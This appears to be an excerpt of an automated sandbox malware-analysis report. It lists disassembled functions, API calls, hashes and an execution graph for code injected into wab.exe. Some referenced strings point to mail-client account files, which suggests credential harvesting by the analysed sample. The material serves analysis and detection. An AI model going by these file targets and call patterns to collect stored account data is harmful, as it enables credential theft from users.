                                                  • Instruction Fuzzy Hash: 0EF0A9716C4712BEC26116356D44F7F3A678FD1661B250514FF1496185FE2887224174
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 22161E89: lstrlenW.KERNEL32(?,?,?,?,?,221610DF,?,?,?,00000000), ref: 22161E9A
                                                    • Part of subcall function 22161E89: lstrcatW.KERNEL32(?,?), ref: 22161EAC
                                                    • Part of subcall function 22161E89: lstrlenW.KERNEL32(?,?,221610DF,?,?,?,00000000), ref: 22161EB3
                                                    • Part of subcall function 22161E89: lstrlenW.KERNEL32(?,?,221610DF,?,?,?,00000000), ref: 22161EC8
                                                    • Part of subcall function 22161E89: lstrcatW.KERNEL32(?,221610DF), ref: 22161ED3
                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2216122A
                                                    • Part of subcall function 2216173A: _strlen.LIBCMT ref: 22161855
                                                    • Part of subcall function 2216173A: _strlen.LIBCMT ref: 22161869
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                  • API String ID: 4036392271-1520055953
                                                  • Opcode ID: 0ff738f7b2d4366390a90fc610540004701f8462b87d2d493b9083df757a668a
                                                  • Instruction ID: 0d8ca160fb19f0916441da1a5d81de97c3205816722330b9a5577f696f9c0154
                                                  • Opcode Fuzzy Hash: 0ff738f7b2d4366390a90fc610540004701f8462b87d2d493b9083df757a668a
                                                  • Instruction Fuzzy Hash: 7A218479E903086AEB2097D4DC81FFE7339EF90714F100556FA04EB2E4E6B15E908759
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,22164AEA,?,?,22164A8A,?,22172238,0000000C,22164BBD,00000000,00000000), ref: 22164B59
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 22164B6C
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,22164AEA,?,?,22164A8A,?,22172238,0000000C,22164BBD,00000000,00000000,00000001,22162082), ref: 22164B8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 4054c957cbf40c246cc920f078f6a00fc5195fa9c41db855e1fd188b9466ef9a
                                                  • Instruction ID: 7066cc6b74138f8c7f8422054e9cf5c61e5f5cf2eee6b8a2c04d58587d2f46e3
                                                  • Opcode Fuzzy Hash: 4054c957cbf40c246cc920f078f6a00fc5195fa9c41db855e1fd188b9466ef9a
                                                  • Instruction Fuzzy Hash: 27F0AF35A80219BFEB219F92C809FBEBFF9EF08351F014164FD05A6148DB358A51CA91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 2216715C
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2216717F
                                                    • Part of subcall function 221656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22165702
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 221671A5
                                                  • _free.LIBCMT ref: 221671B8
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 221671C7
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 249d7dcf2294747329bad2bb3ea8b9a78b32b62e02437decdc3fd6daa22f5132
                                                  • Instruction ID: 19ecba752f7516a36aef475477784aa95b7e8453743f2067a204b1d2c9140316
                                                  • Opcode Fuzzy Hash: 249d7dcf2294747329bad2bb3ea8b9a78b32b62e02437decdc3fd6daa22f5132
                                                  • Instruction Fuzzy Hash: 4F0184726863157F63110EB75C88DFF7A6DDEC2EA5311066BBE04C7208EB658E1381B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,?,00000000,2216636D,22165713,00000000,?,22162249,?,?,22161D66,00000000,?,?,00000000), ref: 22165B7F
                                                  • _free.LIBCMT ref: 22165BB4
                                                  • _free.LIBCMT ref: 22165BDB
                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22165BE8
                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22165BF1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 2dbf5ba76772c7ccf2192fcc5a1840e4cdb4eb00bf714266d5d3f4527aab118b
                                                  • Instruction ID: 86aa81edf73129b032a7eef71746d25be0d3579db98b0dae737fad2c79278bd1
                                                  • Opcode Fuzzy Hash: 2dbf5ba76772c7ccf2192fcc5a1840e4cdb4eb00bf714266d5d3f4527aab118b
                                                  • Instruction Fuzzy Hash: 02012DB22C4703BFD22216351D84E7F3AAB9BC26707260114FF1596142FF79CB318124
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,?,?,221610DF,?,?,?,00000000), ref: 22161E9A
                                                  • lstrcatW.KERNEL32(?,?), ref: 22161EAC
                                                  • lstrlenW.KERNEL32(?,?,221610DF,?,?,?,00000000), ref: 22161EB3
                                                  • lstrlenW.KERNEL32(?,?,221610DF,?,?,?,00000000), ref: 22161EC8
                                                  • lstrcatW.KERNEL32(?,221610DF), ref: 22161ED3
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$lstrcat
                                                  • String ID:
                                                  • API String ID: 493641738-0
                                                  • Opcode ID: 61060e37e611360754de8e6a19111c94d977432cb1f2bece3e0ce2baa9484e30
                                                  • Instruction ID: 143349c0dce3d277226ee39bb71869801e9caf35942a951e9cc53b517caa92f5
                                                  • Opcode Fuzzy Hash: 61060e37e611360754de8e6a19111c94d977432cb1f2bece3e0ce2baa9484e30
                                                  • Instruction Fuzzy Hash: C4F0E9275802107AD321275BAC85EBF777CEFC5B20B100019FA0883190DB94595282B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 221691D0
                                                    • Part of subcall function 2216571E: HeapFree.KERNEL32(00000000,00000000,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?), ref: 22165734
                                                    • Part of subcall function 2216571E: GetLastError.KERNEL32(?,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?,?), ref: 22165746
                                                  • _free.LIBCMT ref: 221691E2
                                                  • _free.LIBCMT ref: 221691F4
                                                  • _free.LIBCMT ref: 22169206
                                                  • _free.LIBCMT ref: 22169218
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 2dfa2aedd18a218e8dda9af975cd1e3548528364144e6a39832ed0171fb7794a
                                                  • Instruction ID: 61cac782f8a6f5bbb1b0db11f223ca55f3bea0d8428171154311946b7fc7f986
                                                  • Opcode Fuzzy Hash: 2dfa2aedd18a218e8dda9af975cd1e3548528364144e6a39832ed0171fb7794a
                                                  • Instruction Fuzzy Hash: 2AF0C8716C4344ABC674DB54D6C5C7F7BDAEB503253640C09FA04CB808D734F9A08650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 2216536F
                                                    • Part of subcall function 2216571E: HeapFree.KERNEL32(00000000,00000000,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?), ref: 22165734
                                                    • Part of subcall function 2216571E: GetLastError.KERNEL32(?,?,2216924F,?,00000000,?,00000000,?,22169276,?,00000007,?,?,22167E5A,?,?), ref: 22165746
                                                  • _free.LIBCMT ref: 22165381
                                                  • _free.LIBCMT ref: 22165394
                                                  • _free.LIBCMT ref: 221653A5
                                                  • _free.LIBCMT ref: 221653B6
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 5bb026a99b3452792e11b2342b5618ff42d9874410d3c6f3a3517c2ec4ee930a
                                                  • Instruction ID: 8ee75b7e346adda602332094bf1761216663c5930df2b92deefda2c3d3c9f51c
                                                  • Opcode Fuzzy Hash: 5bb026a99b3452792e11b2342b5618ff42d9874410d3c6f3a3517c2ec4ee930a
                                                  • Instruction Fuzzy Hash: 41F09670ED0325EFC6625F248941C7F3BF1B7947603450909FD109B258F7380615CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 22164C1D
                                                  • _free.LIBCMT ref: 22164CE8
                                                  • _free.LIBCMT ref: 22164CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                  • API String ID: 2506810119-3377118234
                                                  • Opcode ID: b6a8656d5b6c083fbe9f4043bf01d7e74c2c3f910060a7fa145f5d29619b7246
                                                  • Instruction ID: 6a1076f8ab7af6150c947a7bbeb6839d49bd4daf67de522057a4c05c83f19173
                                                  • Opcode Fuzzy Hash: b6a8656d5b6c083fbe9f4043bf01d7e74c2c3f910060a7fa145f5d29619b7246
                                                  • Instruction Fuzzy Hash: C131BD71AC031CAFCB22CF998981DBEBBFDEB95310B104066E90497304E7758B50CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22166FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 22168731
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 221687BA
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 221687CC
                                                  • __freea.LIBCMT ref: 221687D5
                                                    • Part of subcall function 221656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22165702
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                  • String ID:
                                                  • API String ID: 2652629310-0
                                                  • Opcode ID: 036d8ff49e1fdaa3413d5e9155e66a7d1a3a9a3c5b5a0b19e8f0114094cfeac0
                                                  • Instruction ID: d949fd466ac0729123f9fd439fc5f8a430c0e957561b4f341407b54c9a8a55be
                                                  • Opcode Fuzzy Hash: 036d8ff49e1fdaa3413d5e9155e66a7d1a3a9a3c5b5a0b19e8f0114094cfeac0
                                                  • Instruction Fuzzy Hash: 3231AD32A4031AAFDF248F65CC84EFF7BA5EB44314F420268ED04DA190E735DA69CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22161D66,00000000,00000000,?,22165C88,22161D66,00000000,00000000,00000000,?,22165E85,00000006,FlsSetValue), ref: 22165D13
                                                  • GetLastError.KERNEL32(?,22165C88,22161D66,00000000,00000000,00000000,?,22165E85,00000006,FlsSetValue,2216E190,FlsSetValue,00000000,00000364,?,22165BC8), ref: 22165D1F
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22165C88,22161D66,00000000,00000000,00000000,?,22165E85,00000006,FlsSetValue,2216E190,FlsSetValue,00000000), ref: 22165D2D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 38c977b0c18de7b792cccb22cbccf382d744cbf5efe3977e19ad0cefb5e9d8bc
                                                  • Instruction ID: cb288c3f14cf15f4f49fce1451fb77d8bf2eaf2917bcd45c3270c06d88117be3
                                                  • Opcode Fuzzy Hash: 38c977b0c18de7b792cccb22cbccf382d744cbf5efe3977e19ad0cefb5e9d8bc
                                                  • Instruction Fuzzy Hash: 7A01D4367C2326BBC3114A6A8C48EBF3B98AF056A57110B20FF19D7185D725DA21CAE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: : $Se.
                                                  • API String ID: 4218353326-4089948878
                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                  • Instruction ID: 87a9ca4f7de4eed10084896c28d2d41a629964cb8cb01952faea7ff18c0c1492
                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                  • Instruction Fuzzy Hash: 8A11C1B1940348AECB14CFA89841FFEFBFCAF19304F10409AE545E7212E6705B1287A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 22162903
                                                    • Part of subcall function 221635D2: RaiseException.KERNEL32(?,?,?,22162925,00000000,00000000,00000000,?,?,?,?,?,22162925,?,221721B8), ref: 22163632
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 22162920
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.4226255221.0000000022161000.00000040.00001000.00020000.00000000.sdmp, Offset: 22160000, based on PE: true
                                                  • Associated: 00000007.00000002.4226239667.0000000022160000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000007.00000002.4226255221.0000000022176000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_22160000_wab.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID: Unknown exception
                                                  • API String ID: 3476068407-410509341
                                                  • Opcode ID: 31d77fc3b236539628864aa1290ff7eb9293a14a4b7f7a140d6c5ae05e22d347
                                                  • Instruction ID: 04a7bdf9a9f5b6539f1f652ac54561a6fd98be5e390ae4d817af25a92b8bf756
                                                  • Opcode Fuzzy Hash: 31d77fc3b236539628864aa1290ff7eb9293a14a4b7f7a140d6c5ae05e22d347
                                                  • Instruction Fuzzy Hash: D6F0A43498030C7B8B08AAA5EC45DBD77BC5B10750B504274AA24A6494EBB1EB36C5C0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:6%
                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                  Signature Coverage:1.5%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:63
                                                  execution_graph 40499 441819 40502 430737 40499->40502 40501 441825 40503 430756 40502->40503 40504 43076d 40502->40504 40505 430774 40503->40505 40506 43075f 40503->40506 40504->40501 40517 43034a memcpy 40505->40517 40516 4169a7 11 API calls 40506->40516 40509 4307ce 40510 430819 memset 40509->40510 40518 415b2c 11 API calls 40509->40518 40510->40504 40511 43077e 40511->40504 40511->40509 40514 4307fa 40511->40514 40513 4307e9 40513->40504 40513->40510 40519 4169a7 11 API calls 40514->40519 40516->40504 40517->40511 40518->40513 40519->40504 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38290 4466f4 38309 446904 38290->38309 38292 446700 GetModuleHandleA 38295 446710 __set_app_type __p__fmode __p__commode 38292->38295 38294 4467a4 38296 4467ac __setusermatherr 38294->38296 38297 4467b8 38294->38297 38295->38294 38296->38297 38310 4468f0 _controlfp 38297->38310 38299 4467bd _initterm __wgetmainargs _initterm 38300 44681e GetStartupInfoW 38299->38300 38301 446810 38299->38301 38303 446866 GetModuleHandleA 38300->38303 38311 41276d 38303->38311 38307 446896 exit 38308 44689d _cexit 38307->38308 38308->38301 38309->38292 38310->38299 38312 41277d 38311->38312 38354 4044a4 LoadLibraryW 38312->38354 38314 412785 38315 412789 38314->38315 38362 414b81 38314->38362 38315->38307 38315->38308 38318 4127c8 38368 412465 memset ??2@YAPAXI 38318->38368 38320 4127ea 38380 40ac21 38320->38380 38325 412813 38398 40dd07 memset 38325->38398 38326 412827 38403 40db69 memset 38326->38403 38329 412822 38424 4125b6 ??3@YAXPAX 38329->38424 38331 40ada2 _wcsicmp 38332 41283d 38331->38332 38332->38329 38336 412863 CoInitialize 38332->38336 38408 41268e 38332->38408 38428 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38336->38428 38337 41296f 38430 40b633 38337->38430 38342 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38346 412957 38342->38346 38351 4128ca 38342->38351 38346->38329 38347 4128d0 TranslateAcceleratorW 38348 412941 GetMessageW 38347->38348 38347->38351 38348->38346 38348->38347 38349 412909 IsDialogMessageW 38349->38348 38349->38351 38350 4128fd IsDialogMessageW 38350->38348 38350->38349 38351->38347 38351->38349 38351->38350 38352 41292b TranslateMessage DispatchMessageW 38351->38352 38353 41291f IsDialogMessageW 38351->38353 38352->38348 38353->38348 38353->38352 38355 4044f7 38354->38355 38356 4044cf GetProcAddress 38354->38356 38360 404507 MessageBoxW 38355->38360 38361 40451e 38355->38361 38357 4044e8 FreeLibrary 38356->38357 38358 4044df 38356->38358 38357->38355 38359 4044f3 38357->38359 38358->38357 38359->38355 38360->38314 38361->38314 38363 414b8a 38362->38363 38364 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38362->38364 38434 40a804 memset 38363->38434 38364->38318 38367 414b9e GetProcAddress 38367->38364 38369 4124e0 38368->38369 38370 412505 ??2@YAPAXI 38369->38370 38371 41251c 38370->38371 38373 412521 38370->38373 38456 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38371->38456 38445 444722 38373->38445 38379 41259b wcscpy 38379->38320 38461 40b1ab ??3@YAXPAX ??3@YAXPAX 38380->38461 38382 40ac5c 38385 40ad4b 38382->38385 38386 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38382->38386 38388 40ace7 ??3@YAXPAX 38382->38388 38393 40ad76 38382->38393 38465 40a8d0 38382->38465 38477 4099f4 38382->38477 38385->38393 38485 40a9ce 38385->38485 38386->38382 38388->38382 38392 40a8d0 7 API calls 38392->38393 38462 40aa04 38393->38462 38394 40ada2 38395 40adc9 38394->38395 38397 40adaa 38394->38397 38395->38325 38395->38326 38396 40adb3 _wcsicmp 38396->38395 38396->38397 38397->38395 38397->38396 38490 40dce0 38398->38490 38400 40dd3a GetModuleHandleW 38495 40dba7 38400->38495 38404 40dce0 3 API calls 38403->38404 38405 40db99 38404->38405 38567 40dae1 38405->38567 38581 402f3a 38408->38581 38410 412766 38410->38329 38410->38336 38411 4126d3 _wcsicmp 38412 4126a8 38411->38412 38412->38410 38412->38411 38414 41270a 38412->38414 38615 4125f8 7 API calls 38412->38615 38414->38410 38584 411ac5 38414->38584 38425 4125da 38424->38425 38426 4125f0 38425->38426 38427 4125e6 DeleteObject 38425->38427 38429 40b1ab ??3@YAXPAX ??3@YAXPAX 38426->38429 38427->38426 38428->38342 38429->38337 38431 40b640 38430->38431 38432 40b639 ??3@YAXPAX 38430->38432 38433 40b1ab ??3@YAXPAX ??3@YAXPAX 38431->38433 38432->38431 38433->38315 38435 40a83b GetSystemDirectoryW 38434->38435 38436 40a84c wcscpy 38434->38436 38435->38436 38441 409719 wcslen 38436->38441 38439 40a881 LoadLibraryW 38440 40a886 38439->38440 38440->38364 38440->38367 38442 409724 38441->38442 38443 409739 wcscat LoadLibraryW 38441->38443 38442->38443 38444 40972c wcscat 38442->38444 38443->38439 38443->38440 38444->38443 38446 444732 38445->38446 38447 444728 DeleteObject 38445->38447 38457 409cc3 38446->38457 38447->38446 38449 412551 38450 4010f9 38449->38450 38451 401130 38450->38451 38452 401134 GetModuleHandleW LoadIconW 38451->38452 38453 401107 wcsncat 38451->38453 38454 40a7be 38452->38454 38453->38451 38455 40a7d2 38454->38455 38455->38379 38455->38455 38456->38373 38460 409bfd memset wcscpy 38457->38460 38459 409cdb CreateFontIndirectW 38459->38449 38460->38459 38461->38382 38463 40aa14 38462->38463 38464 40aa0a ??3@YAXPAX 38462->38464 38463->38394 38464->38463 38466 40a8eb 38465->38466 38467 40a8df wcslen 38465->38467 38468 40a906 ??3@YAXPAX 38466->38468 38469 40a90f 38466->38469 38467->38466 38470 40a919 38468->38470 38471 4099f4 3 API calls 38469->38471 38472 40a932 38470->38472 38473 40a929 ??3@YAXPAX 38470->38473 38471->38470 38475 4099f4 3 API calls 38472->38475 38474 40a93e memcpy 38473->38474 38474->38382 38476 40a93d 38475->38476 38476->38474 38478 409a41 38477->38478 38479 4099fb malloc 38477->38479 38478->38382 38481 409a37 38479->38481 38482 409a1c 38479->38482 38481->38382 38483 409a30 ??3@YAXPAX 38482->38483 38484 409a20 memcpy 38482->38484 38483->38481 38484->38483 38486 40a9e7 38485->38486 38487 40a9dc ??3@YAXPAX 38485->38487 38489 4099f4 3 API calls 38486->38489 38488 40a9f2 38487->38488 38488->38392 38489->38488 38514 409bca GetModuleFileNameW 38490->38514 38492 40dce6 wcsrchr 38493 40dcf5 38492->38493 38494 40dcf9 wcscat 38492->38494 38493->38494 38494->38400 38515 44db70 38495->38515 38499 40dbfd 38518 4447d9 38499->38518 38502 40dc34 wcscpy wcscpy 38544 40d6f5 38502->38544 38503 40dc1f wcscpy 38503->38502 38506 40d6f5 3 API calls 38507 40dc73 38506->38507 38508 40d6f5 3 API calls 38507->38508 38509 40dc89 38508->38509 38510 40d6f5 3 API calls 38509->38510 38511 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38510->38511 38550 40da80 38511->38550 38514->38492 38516 40dbb4 memset memset 38515->38516 38517 409bca GetModuleFileNameW 38516->38517 38517->38499 38520 4447f4 38518->38520 38519 40dc1b 38519->38502 38519->38503 38520->38519 38521 444807 ??2@YAPAXI 38520->38521 38522 44481f 38521->38522 38523 444873 _snwprintf 38522->38523 38524 4448ab wcscpy 38522->38524 38557 44474a 8 API calls 38523->38557 38525 4448bb 38524->38525 38558 44474a 8 API calls 38525->38558 38528 4448a7 38528->38524 38528->38525 38529 4448cd 38559 44474a 8 API calls 38529->38559 38531 4448e2 38560 44474a 8 API calls 38531->38560 38533 4448f7 38561 44474a 8 API calls 38533->38561 38535 44490c 38562 44474a 8 API calls 38535->38562 38537 444921 38563 44474a 8 API calls 38537->38563 38539 444936 38564 44474a 8 API calls 38539->38564 38541 44494b 38565 44474a 8 API calls 38541->38565 38543 444960 ??3@YAXPAX 38543->38519 38545 44db70 38544->38545 38546 40d702 memset GetPrivateProfileStringW 38545->38546 38547 40d752 38546->38547 38548 40d75c WritePrivateProfileStringW 38546->38548 38547->38548 38549 40d758 38547->38549 38548->38549 38549->38506 38551 44db70 38550->38551 38552 40da8d memset 38551->38552 38553 40daac LoadStringW 38552->38553 38554 40dac6 38553->38554 38554->38553 38556 40dade 38554->38556 38566 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38554->38566 38556->38329 38557->38528 38558->38529 38559->38531 38560->38533 38561->38535 38562->38537 38563->38539 38564->38541 38565->38543 38566->38554 38577 409b98 GetFileAttributesW 38567->38577 38569 40daea 38570 40db63 38569->38570 38571 40daef wcscpy wcscpy GetPrivateProfileIntW 38569->38571 38570->38331 38578 40d65d GetPrivateProfileStringW 38571->38578 38573 40db3e 38579 40d65d GetPrivateProfileStringW 38573->38579 38575 40db4f 38580 40d65d GetPrivateProfileStringW 38575->38580 38577->38569 38578->38573 38579->38575 38580->38570 38616 40eaff 38581->38616 38585 411ae2 memset 38584->38585 38586 411b8f 38584->38586 38656 409bca GetModuleFileNameW 38585->38656 38598 411a8b 38586->38598 38588 411b0a wcsrchr 38589 411b22 wcscat 38588->38589 38590 411b1f 38588->38590 38657 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38589->38657 38590->38589 38592 411b67 38658 402afb 38592->38658 38596 411b7f 38714 40ea13 SendMessageW memset SendMessageW 38596->38714 38599 402afb 27 API calls 38598->38599 38600 411ac0 38599->38600 38601 4110dc 38600->38601 38602 41113e 38601->38602 38607 4110f0 38601->38607 